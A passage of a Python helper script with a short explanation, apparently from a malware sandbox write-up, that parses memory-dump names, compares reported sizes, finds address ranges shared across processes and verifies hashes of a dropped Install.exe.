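    """Render a byte count the way the report does: whole KiB below 1 MiB, one decimal MiB above."""
    if n < 1024 * 1024:
        return f"{n // 1024}KB"
    return f"{n / (1024 * 1024):.1f}MB"


def size_mismatches(reported):
    """Return names whose address range does not agree with the Filesize the report shows."""
    return [name for name, shown in reported.items()
            if human_size(parse_dump_name(name)["size"]) != shown]


def shared_regions(names):
    """Map each (start, end) range that appears in more than one process to the sorted pids.
    The same range at the same base in several processes usually means one module
    (0x10000000 is the classic default image base for a DLL that was not rebased),
    so it only needs to be carved and analysed once."""
    by_region = defaultdict(set)
    for name in names:
        d = parse_dump_name(name)
        by_region[(d["start"], d["end"])].add(d["pid"])
    return {region: sorted(pids) for region, pids in by_region.items() if len(pids) > 1}


def verify_hashes(data, expected):
    """Compare the digests of a retrieved dropped file with the values the report lists.
    expected maps a hashlib algorithm name (md5, sha1, sha256, sha512) to a hex digest;
    returns the names of the algorithms whose digest did not match."""
    return [algo for algo, want in expected.items()
            if hashlib.new(algo, data).hexdigest().lower() != want.lower()]


if __name__ == "__main__":
    for name in DUMP_NAMES:
        d = parse_dump_name(name)
        print(f"pid {d['pid']:>5}  {d['start']:#012x}-{d['end']:#012x}  {human_size(d['size'])}")
    print("size mismatches:", size_mismatches(SAMPLE_REPORTED))
    for (start, end), pids in shared_regions(DUMP_NAMES).items():
        print(f"range {start:#x}-{end:#x} seen in pids {pids}")
```

Run against the full listing, the one range reported in three processes is 0x10000000-0x1069F000 (pids 1220, 2032 and 2744), while the 6.7MB ranges at process-specific bases match the size of the dropped Install.exe image; verify_hashes is the check to run on Install.exe once it has been pulled from the sandbox, before treating it as the same artifact the report describes.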